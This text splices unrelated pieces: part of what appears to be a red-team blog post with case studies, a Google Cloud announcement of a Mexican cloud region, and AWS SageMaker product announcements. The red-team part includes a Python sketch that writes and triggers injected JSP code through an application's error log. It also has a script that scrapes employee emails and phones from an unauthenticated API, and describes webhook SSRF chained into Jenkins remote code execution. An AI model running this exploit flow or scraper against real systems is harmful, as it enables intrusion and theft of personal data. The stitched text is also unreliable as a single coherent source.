Among hundreds of external applications identified during the reconnaissance phase, one stood out: a commercial Java-based supply chain management solution hosted in the cloud. This application drew additional attention upon discovery of an online forum post describing its installation procedures. Within the post, a link to an unlisted YouTube video was shared, offering detailed installation and administration guidance. Upon reviewing the video, the AppSec Team noted the URL for the application’s trial installer, still accessible online despite not being referenced or indexed anywhere else.
Following installation and local deployment, an administration manual was available within the installation folder. This manual contained a section for a web-based performance monitor plugin that was deployed by default with the application, along with its default credentials. The plugin’s functionality included logging performance metrics and stack traces locally in files upon encountering unhandled errors. Furthermore, the plugin’s endpoint name was uniquely distinct, making it highly unlikely to be discovered with conventional directory brute-forcing methods.
Vulnerability Identification
The AppSec Team successfully logged into the organization’s performance monitor plugin by using the default credentials sourced from the administration manual and resumed local testing to identify post-authentication vulnerabilities. Conducting code review in parallel with manual testing, a log management feature was identified, which allowed authenticated users to manipulate log filenames and directories. The team also observed they could induce errors through targeted, malformed HTTP requests. In conjunction with the log filename manipulation, it was possible to force arbitrary data to be stored at an arbitrary file location on the underlying server’s file system.
Exploitation
The strategy involved intentionally triggering exceptions, which the performance monitor would then log in an attacker-defined Jakarta Server Pages (JSP) file within the web application’s root directory. The AppSec Team crafted an exploit that injected arbitrary JSP code into an HTTP request’s parameter, forcing the performance monitor to log errors into the attacker-controlled JSP file. Upon accessing the JSP log file, the injected code executed, enabling Mandiant to breach the customer’s cloud environment and access thousands of sensitive logistics documents.
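In generic terms, this write primitive takes three steps: point the plugin’s log file at a path under the web root, trigger an error whose attacker-controlled parameter gets logged there, then request the resulting file so the injected code executes. The sketch below illustrates that flow with entirely hypothetical endpoints, parameters, and settings.

```python
# Sketch of the generic "error log as file-write primitive" flow.
# All URLs, parameter names, and the log-path setting are hypothetical.
import requests

BASE = "https://scm.example.com"             # hypothetical target
SESSION = {"Cookie": "JSESSIONID=REDACTED"}  # authenticated monitor session

# 1) Point the performance monitor's log file at a JSP path under the web root.
requests.post(
    f"{BASE}/perfmon/settings",
    headers=SESSION,
    data={"logDirectory": "../webapps/ROOT", "logFileName": "health.jsp"},
    timeout=30,
)

# 2) Trigger an unhandled error with a JSP expression in a request parameter,
#    so the logged stack trace embeds it inside health.jsp.
jsp_probe = '<%= System.getProperty("user.name") %>'
requests.get(
    f"{BASE}/perfmon/report", headers=SESSION, params={"range": jsp_probe}, timeout=30
)

# 3) Request the log file; the container now interprets the injected JSP.
print(requests.get(f"{BASE}/health.jsp", timeout=30).text)
```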
Takeaways
A common assumption that breaches should lead to internal on-premises network access or to Active Directory compromise was challenged in this case study. While lateral movement was constrained by time, the primary objective was achieved: emulating an initial access broker. This involved breaching the cloud environment, where the client lacked visibility compared to its internal Active Directory network, and gaining access to business-critical crown jewels.
Collaborative Intrusion: Webhooks to CI/CD Pipeline Access
Context
A company in the automotive sector engaged Mandiant to perform a Red Team assessment, with the goal of obtaining access to their continuous integration and continuous delivery/deployment (CI/CD) pipeline. Due to the sheer number of externally exposed systems, the AppSec Team was staffed to support the Red Team’s reconnaissance and breaching efforts.
Target of Interest
Most of the interesting applications redirected to the customer’s single sign-on (SSO) provider. However, one application behaved differently. By querying the Wayback Machine, the team uncovered an endpoint that did not redirect to the SSO. Instead, it presented a blank page with a unique favicon. With the goal of identifying the application’s underlying technology, the favicon’s hash was calculated and queried using Shodan. The results returned many other live applications sharing the same favicon. Interestingly, some of these applications operated independently of SSO, aiding the team in identifying the application’s name and vendor.
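The favicon pivot is simple to reproduce: Shodan indexes favicons by the MurmurHash3 of their base64-encoded bytes, so computing that hash locally yields a search filter for other hosts serving the same icon. A minimal sketch with a hypothetical URL:

```python
# Sketch: compute the Shodan-style favicon hash (MurmurHash3 of the
# base64-encoded favicon) and print the corresponding search filter.
# Requires the `mmh3` and `requests` packages; the URL is hypothetical.
import codecs

import mmh3
import requests

resp = requests.get("https://crm.example.com/favicon.ico", timeout=10)
resp.raise_for_status()

favicon_b64 = codecs.encode(resp.content, "base64")  # keep newlines, as Shodan does
print(f"http.favicon.hash:{mmh3.hash(favicon_b64)}")
```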
Vulnerability Identification
Once the application’s name was identified, the team visited the vendor’s website and accessed their public API documentation. Among the API endpoints, one stood out—it could be directly accessed on the customer’s application without redirection to the SSO. This API endpoint did not require authentication and only took an incremental numerical ID as its parameter’s value. Upon querying, the response contained sensitive employee information, including email addresses and phone numbers. The team systematically iterated through the API endpoint, incrementing the ID parameter to compile a comprehensive list of employee email addresses and phone numbers. However, the Red Team refrained from leveraging this data, as another intriguing application was discovered. This application exposed a feature that could be manipulated into sending fully user-controlled emails from the company’s no-reply@ email address.
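Enumerating an unauthenticated endpoint keyed on an incremental ID, as described above, is a simple loop; the sketch below shows the general pattern with a hypothetical endpoint and field names.

```python
# Sketch: enumerate an unauthenticated API endpoint keyed on an incremental
# numeric ID. The endpoint, ID range, and field names are hypothetical.
import csv

import requests

BASE = "https://app.example.com/api/v2/employees"  # hypothetical endpoint

with open("employees.csv", "w", newline="") as out:
    writer = csv.writer(out)
    writer.writerow(["id", "email", "phone"])
    for employee_id in range(1, 5000):
        resp = requests.get(f"{BASE}/{employee_id}", timeout=10)
        if resp.status_code != 200:
            continue
        record = resp.json()
        writer.writerow([employee_id, record.get("email"), record.get("phone")])
```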
Capitalizing on these vulnerabilities, the Red Team initiated a phishing campaign, successfully gaining a foothold in the customer’s network before the AppSec Team could identify an external breach vector. As efforts continued on the internal post-exploitation, the application security consultants shifted their focus to support the Red Team’s efforts within the internal network.
Exploitation
Digging into network shares, the Red Team found credentials for a developer account on an enterprise source control application. The AppSec Team sifted through reconnaissance data and flagged that the same source control application server was exposed externally. The credentials were successfully used to log in, as multi-factor authentication was absent for this user. Within the GitHub interface, the team uncovered a pre-defined webhook linked to the company’s internal Jenkins, an integration commonly employed for facilitating communication between source control systems and CI/CD pipelines. Leveraging this discovery, the team created a new webhook. When manually triggered by the team, this webhook would perform an SSRF to internal URLs. This eventually led to the exploitation of an unauthenticated Jenkins sandbox bypass vulnerability (CVE-2019-1003030), and ultimately to remote code execution, effectively compromising the organization’s CI/CD pipeline.
Takeaways
In this case study, the efficacy of collaboration between the Red Team and the AppSec Team was demonstrated. Leveraging insights gathered collectively, the teams devised a strategic plan to achieve the main objective set by the customer: accessing its CI/CD pipelines. Moreover, we challenged the misconception that singular critical vulnerabilities are indispensable for reaching objectives. Instead, we revealed the reality where achieving goals often requires innovative detours. In fact, a combination of vulnerabilities or misconfigurations, whether they are discovered by the AppSec Team or the Red Team, can be strategically chained together to accomplish the mission.
Conclusion
As this blog post demonstrated, the integration of application security expertise into Red Team assessments yields significant benefits for organizations seeking to understand and strengthen their security posture. By proactively identifying and addressing vulnerabilities across the entire attack surface, including those commonly overlooked by traditional approaches, businesses can minimize the risk of breaches, protect critical assets, and hopefully avoid the financial and reputational damage associated with successful attacks.
This integrated approach is not limited to Red Team engagements. Organizations with varying maturity levels can also leverage application security expertise within the context of focused external perimeter assessments. These assessments provide a valuable and cost-effective way to gain insights into the security of internet-facing applications and systems, without the need for a Red Team exercise.
Whether through a comprehensive Red Team engagement or a targeted external assessment, incorporating application security expertise enables organizations to better simulate the tactics and techniques of modern adversaries.
Google Cloud is delighted to announce the opening of our 41st cloud region in Querétaro, Mexico. This marks our third cloud region in Latin America, joining Santiago, Chile, and São Paulo, Brazil. From Querétaro, we’ll provide fast, reliable cloud services to businesses and public sector organizations throughout Mexico and beyond. This new region offers low latency, high performance, and local data residency, empowering organizations to innovate and accelerate digital transformation initiatives.
Helping organizations in Mexico thrive in the cloud
Google Cloud regions are major investments to bring best-in-class infrastructure, cloud and AI technologies closer to customers. Enterprises, startups, and public sector organizations can leverage Google Cloud’s infrastructure economy of scale and global network to deliver applications and digital services to their end users.
With this new region in Querétaro, Mexico, Google Cloud customers enjoy:
Speed: Serve your end users with fast, low-latency experiences, and transfer large amounts of data between networks easily across Google’s global network.
Security: Keep your organizations’ and customers’ data secure and compliant, including meeting the requirements of CNBV contractual frameworks, and maintain local data residency.
Capacity: Scale to meet growing user and business needs.
Sustainability: Reduce the carbon footprint of your IT environment and help meet sustainability targets.
Google Cloud customers are eager to benefit from the new possibilities that this cloud region offers:
“At Prosa, we have been undergoing a transformation process for the past three years that involves adopting technology and developing digital skills within our teams. The partnership with Google has been key to carrying out projects, evolving towards digital business models, enabling the ecosystem, promoting the API-ification of services, and improving data analysis. This alliance is only deepened with the launch of the new Google Cloud region, which will facilitate the integration of participants into the payment ecosystem in a secure and highly available manner, improving the customer experience and delivering value more quickly and agilely,” said Salvador Espinosa, CEO of Prosa, a payment technology company that processed more than 10 million transactions in 2023.
The new Google Cloud region in Querétaro, Mexico is also welcomed by the Mexican public sector.
“The new Google cloud region in Mexico will be key to build a digital government accountable to citizens, deepening our path to digital transformation. Since 2018, the Auditoria Superior de la Federación (ASF) has pioneered digital transformation in Mexico, promoting innovation and the responsible use of technology, while using advanced technologies like Google Cloud’s Vertex AI, among other proprietary tools, to enhance data analysis, automate processes, and improve collaboration. This enables more accurate decision-making, optimized oversight of public spending, increased inspection coverage, and transparent use of resources. Thanks to the cloud, we see a future where technology is a strategic ally to execute efficient, agile and exhaustive digital audits, detect irregularities early, and strengthen accountability. ASF’s focus on transparency and efficiency aligns with President Claudia Sheinbaum’s public innovation policy.” – Emilio Barriga Delgado, Special Auditor of Federalized Expenditure, Auditoria Superior de la Federación
The new cloud region also opens new opportunities for our global ecosystem of over 100,000 incredibly diverse partners.
“For Amarello and our customers, the availability of a new region in Mexico demonstrates the great growth of Google Cloud and its commitment to Mexico. It’s also a great milestone for the country, putting us on par with other economies. This will create jobs that will speed up our clients’ adoption of strategic projects and latency-sensitive technological services such as financial services or mission-critical operations. At the same time, the new region will enable projects that require information to be maintained within the national territory, now on the most innovative and secure public cloud.” – Mauricio Sánchez Valderrama, managing partner, Amarello Tecnologías de Información
And for global companies looking to tap into the Mexican market:
“As networks shift to a cloud-first approach, and hybrid work enables work from anywhere, businesses in the Mexico region can now securely accelerate innovation, boost efficiency, and enhance customer experiences with Palo Alto Networks AI-powered solutions, like Prisma SASE, built in the cloud to secure the cloud at scale. The powerful collaboration between Google Cloud and Palo Alto Networks reinforces our commitment to security and innovation so organizations can confidently embrace the AI-driven future, knowing their users, data, and applications are protected from evolving threats.” – Anupam Upadhyaya, Vice President, Product Management, Palo Alto Networks
Delivering on our commitment to Latin America
In 2022, we announced a five-year, $1.2 billion commitment to Latin America, focusing on four key areas: digital infrastructure, digital skills, entrepreneurship, and inclusive, sustainable communities.
We’re equally committed to creating new career opportunities for people in Mexico and Latin America: We’re working with over 550 universities across Latin America to offer a robust and continuously updated portfolio of learning resources so students can seize the opportunities created by new digital technologies like AI and the cloud. As a result, we’ve already granted more than 14,000 digital skill badges to students and individual developers in Mexico over the last 24 months.
Another example of our commitment is the “Súbete a la nube” program that we created in partnership with the Inter-American Development Bank (IDB), with a focus on women and the southern region of the country. To date, 12,500 people have registered for essential digital skills training in cloud computing through the program.
Today, we’re also announcing a commitment to train 1 million Mexicans in AI and cloud technologies over the coming years. Google Cloud will continue to skill Mexico’s local talent with a variety of no-cost training programs for students, developers and customers. Some of the ongoing training programs will include no-cost, localized courses available through YouTube, credentials through the Google Cloud Skills Boost platform, community support by Google Developer Groups, and scholarships for the Google Career Certificates that help prepare learners for high-growth, in-demand jobs in fields like cybersecurity and data analytics, so the cloud can truly democratize innovation and technology.
This new Google Cloud region is also a step towards providing generative AI products and services to Latin American customers. Cloud computing will increasingly be a key gateway towards the development and usage of AI, helping organizations compete and innovate at global scale.
Google Cloud is dedicated to being the partner of choice for customers undergoing digital transformation. We’re focused on providing sustainable, low-carbon options for running applications and infrastructure. Since 2017, we’ve matched 100% of our global annual electricity use with renewable energy. We’re aiming even higher with our 2030 goal: operating on 24/7 carbon-free energy across every electricity grid where we operate, including Mexico.
We’re incredibly excited to open the Querétaro, Mexico region, bringing low-latency, reliable cloud services to Mexico and Latin America, so organizations can take advantage of all that the cloud has to offer. Stay tuned for even more Google Cloud regions coming in 2025 (and beyond), and click here to learn more about Google Cloud’s global infrastructure.
Today Amazon Web Services, Inc. (AWS) announced the general availability of Amazon SageMaker partner AI apps, a new capability that enables customers to easily discover, deploy, and use best-in-class machine learning (ML) and generative AI (GenAI) development applications from leading app providers privately and securely, all without leaving Amazon SageMaker AI so they can develop performant AI models faster.
Until today, integrating purpose-built GenAI and ML development applications that provide specialized capabilities for a variety of model development tasks required a considerable amount of effort. Beyond the need to invest time and effort in due diligence to evaluate existing offerings, customers had to perform undifferentiated heavy lifting in deploying, managing, upgrading, and scaling these applications. Furthermore, to adhere to rigorous security and compliance protocols, organizations need their data to stay within the confines of their security boundaries without moving it elsewhere, for example, to a Software as a Service (SaaS) application. Finally, the resulting developer experience is often fragmented, with developers having to switch back and forth between multiple disjointed interfaces. With SageMaker partner AI apps, you can quickly subscribe to a partner solution and seamlessly integrate the app with your SageMaker development environment. SageMaker partner AI apps are fully managed and run privately and securely in your SageMaker environment, reducing the risk of data and model exfiltration.
At launch, you will be able to boost your team’s productivity and reduce time to market by enabling: Comet, to track, visualize, and manage experiments for AI model development; Deepchecks, to evaluate quality and compliance for AI models; Fiddler, to validate, monitor, analyze, and improve AI models in production; and, Lakera, to protect AI applications from security threats such as prompt attacks, data loss and inappropriate content.
SageMaker partner AI apps are available in all currently supported regions except AWS GovCloud (US). To learn more, please visit the SageMaker partner AI apps developer guide.
Amazon SageMaker HyperPod now provides you with centralized governance across all generative AI development tasks, such as training and inference. With full visibility and control over compute resource allocation, you can ensure the most critical tasks are prioritized and maximize compute resource utilization, reducing model development costs by up to 40%.
With HyperPod task governance, administrators can more easily define priorities for different tasks and set up limits for how many compute resources each team can use. At any given time, administrators can also monitor and audit the tasks that are running or waiting for compute resources through a visual dashboard. When data scientists create their tasks, HyperPod automatically runs them, adhering to the defined compute resource limits and priorities. For example, when training for a high-priority model needs to be completed as soon as possible but all compute resources are in use, HyperPod frees up resources from lower-priority tasks to support the training. HyperPod pauses the low-priority task, saves the checkpoint, and reallocates the freed-up compute resources. The preempted low-priority task will resume from the last saved checkpoint as resources become available again. And when a team is not fully using the resource limits the administrator has set up, HyperPod uses those idle resources to accelerate another team’s tasks. Additionally, HyperPod is now integrated with Amazon SageMaker Studio, bringing task governance and other HyperPod capabilities into the Studio environment. Data scientists can now seamlessly interact with HyperPod clusters directly from Studio, allowing them to develop, submit, and monitor machine learning (ML) jobs on powerful accelerator-backed clusters.
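The scheduling behavior described above (priority-ordered allocation, preemption with checkpointing, and resumption once capacity frees up) can be illustrated with a small toy scheduler; the Python below is purely conceptual and is not the HyperPod task governance API or configuration.

```python
# Toy illustration of the preempt-checkpoint-resume behavior described above.
# Conceptual only; this is NOT the HyperPod task governance API.
from dataclasses import dataclass
from typing import List

CLUSTER_GPUS = 16  # pretend cluster capacity


@dataclass
class Task:
    name: str
    priority: int          # higher value = more important
    gpus: int
    checkpoint_step: int = 0
    running: bool = False


def schedule(tasks: List[Task]) -> None:
    """Allocate GPUs to the highest-priority tasks, preempting lower ones."""
    free = CLUSTER_GPUS
    for task in sorted(tasks, key=lambda t: t.priority, reverse=True):
        if task.gpus <= free:
            if not task.running:
                print(f"start/resume {task.name} from step {task.checkpoint_step}")
            task.running = True
            free -= task.gpus
        elif task.running:
            # No room once higher-priority work is placed: checkpoint and pause.
            task.checkpoint_step += 1
            task.running = False
            print(f"preempt {task.name}, checkpoint saved at step {task.checkpoint_step}")


if __name__ == "__main__":
    tasks = [Task("exploratory-finetune", priority=1, gpus=12)]
    schedule(tasks)                                    # low-priority job starts
    tasks.append(Task("prod-training", priority=10, gpus=8))
    schedule(tasks)                                    # high-priority job preempts it
    tasks = [t for t in tasks if t.name != "prod-training"]
    schedule(tasks)                                    # resumes from its checkpoint
```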
Task governance for HyperPod is available in all AWS Regions where HyperPod is available: US East (N. Virginia), US West (N. California), US West (Oregon), Asia Pacific (Mumbai), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo), Europe (Frankfurt), Europe (Ireland), Europe (London), Europe (Stockholm), and South America (São Paulo).